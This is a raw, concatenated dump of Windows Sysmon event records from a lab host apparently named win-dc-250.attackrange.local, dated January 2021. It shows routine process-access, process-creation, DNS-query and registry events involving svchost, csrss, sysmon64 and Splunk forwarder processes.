13:12:20.210{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004345Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:20.210{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004344Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:20.210{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004343Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:20.210{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004342Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:20.210{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4334-6000-F100-000000009A01}2284C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004341Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:20.210{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4334-6000-F100-000000009A01}2284C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004340Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:20.210{08A6967A-4334-6000-F100-000000009A01}2284C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 22542200x80000000000000004360Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:19.509{08A6967A-4333-6000-F000-000000009A01}4344win-dc-250.attackrange.local0fe80::1c24:42de:efae:dae3;::ffff:10.0.1.14;C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe 10341000x80000000000000004359Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:21.916{08A6967A-4298-6000-2E00-000000009A01}28083660C:\Windows\sysmon64.exe{08A6967A-4333-6000-F000-000000009A01}4344C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Windows\sysmon64.exe+14ced|C:\Windows\sysmon64.exe+15adb|C:\Windows\sysmon64.exe+16495|C:\Windows\sysmon64.exe+16778|C:\Windows\sysmon64.exe+16aae|C:\Windows\sysmon64.exe+1a5ae|C:\Windows\sysmon64.exe+5ea0|C:\Windows\sysmon64.exe+6037|C:\Windows\System32\sechost.dll+10a75|C:\Windows\System32\sechost.dll+1004d|C:\Windows\System32\sechost.dll+fe55|C:\Windows\System32\sechost.dll+ed3f|C:\Windows\sysmon64.exe+6213|C:\Windows\sysmon64.exe+b0519|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x80000000000000004358Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:19.502{08A6967A-4333-6000-F000-000000009A01}4344win-dc-250.attackrange.local0fe80::1c24:42de:efae:dae3;::ffff:10.0.1.14;C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe 10341000x80000000000000004357Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:21.916{08A6967A-4298-6000-2E00-000000009A01}28083660C:\Windows\sysmon64.exe{08A6967A-4333-6000-F000-000000009A01}4344C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Windows\sysmon64.exe+14ced|C:\Windows\sysmon64.exe+15adb|C:\Windows\sysmon64.exe+16495|C:\Windows\sysmon64.exe+16778|C:\Windows\sysmon64.exe+16aae|C:\Windows\sysmon64.exe+1a5ae|C:\Windows\sysmon64.exe+5ea0|C:\Windows\sysmon64.exe+6037|C:\Windows\System32\sechost.dll+10a75|C:\Windows\System32\sechost.dll+1004d|C:\Windows\System32\sechost.dll+fe55|C:\Windows\System32\sechost.dll+ed3f|C:\Windows\sysmon64.exe+6213|C:\Windows\sysmon64.exe+b0519|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004356Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:21.321{08A6967A-4298-6000-2E00-000000009A01}28083644C:\Windows\sysmon64.exe{08A6967A-4333-6000-F000-000000009A01}4344C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Windows\sysmon64.exe+14ced|C:\Windows\sysmon64.exe+15adb|C:\Windows\sysmon64.exe+16495|C:\Windows\sysmon64.exe+16778|C:\Windows\sysmon64.exe+16aae|C:\Windows\sysmon64.exe+1abb1|C:\Windows\sysmon64.exe+1cfc7|C:\Windows\sysmon64.exe+1d392|C:\Windows\sysmon64.exe+1d4a5|C:\Windows\sysmon64.exe+b0519|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004355Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:21.321{08A6967A-4298-6000-2E00-000000009A01}28083644C:\Windows\sysmon64.exe{08A6967A-4333-6000-F000-000000009A01}4344C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\sysmon64.exe+2682c|C:\Windows\sysmon64.exe+1cc6d|C:\Windows\sysmon64.exe+1d392|C:\Windows\sysmon64.exe+1d4a5|C:\Windows\sysmon64.exe+b0519|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004354Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:21.321{08A6967A-4298-6000-2E00-000000009A01}28083644C:\Windows\sysmon64.exe{08A6967A-4333-6000-F000-000000009A01}4344C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Windows\sysmon64.exe+14ced|C:\Windows\sysmon64.exe+15adb|C:\Windows\sysmon64.exe+16495|C:\Windows\sysmon64.exe+16778|C:\Windows\sysmon64.exe+16aae|C:\Windows\sysmon64.exe+1abb1|C:\Windows\sysmon64.exe+1cfc7|C:\Windows\sysmon64.exe+1d392|C:\Windows\sysmon64.exe+1d4a5|C:\Windows\sysmon64.exe+b0519|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004353Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:21.321{08A6967A-4298-6000-2E00-000000009A01}28083644C:\Windows\sysmon64.exe{08A6967A-4333-6000-F000-000000009A01}4344C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\sysmon64.exe+2682c|C:\Windows\sysmon64.exe+1cc6d|C:\Windows\sysmon64.exe+1d392|C:\Windows\sysmon64.exe+1d4a5|C:\Windows\sysmon64.exe+b0519|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004364Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:29.866{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-433D-6000-F200-000000009A01}4560C:\Windows\system32\wermgr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004363Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:29.866{08A6967A-4288-6000-1000-000000009A01}11361996C:\Windows\system32\svchost.exe{08A6967A-433D-6000-F200-000000009A01}4560C:\Windows\system32\wermgr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a711|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+d305|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+e91d|c:\windows\system32\UBPM.dll+e014|c:\windows\system32\UBPM.dll+115a2|c:\windows\system32\EventAggregation.dll+3fae|c:\windows\system32\EventAggregation.dll+3ea1|c:\windows\system32\EventAggregation.dll+36c9|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b65|C:\Windows\SYSTEM32\ntdll.dll+6586d|C:\Windows\SYSTEM32\ntdll.dll+656d0|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004362Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:29.866{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004361Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:29.866{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000004365Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:12:40.523{08A6967A-4288-6000-1100-000000009A01}1192C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6ea76-0xefdc339e) 10341000x80000000000000004392Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:15.834{08A6967A-436B-6000-F400-000000009A01}42644252C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004391Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:15.677{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-436B-6000-F400-000000009A01}4264C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004390Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:15.677{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004389Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:15.677{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004388Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:15.677{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004387Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:15.677{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004386Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:15.677{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004385Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:15.677{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004384Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:15.677{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004383Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 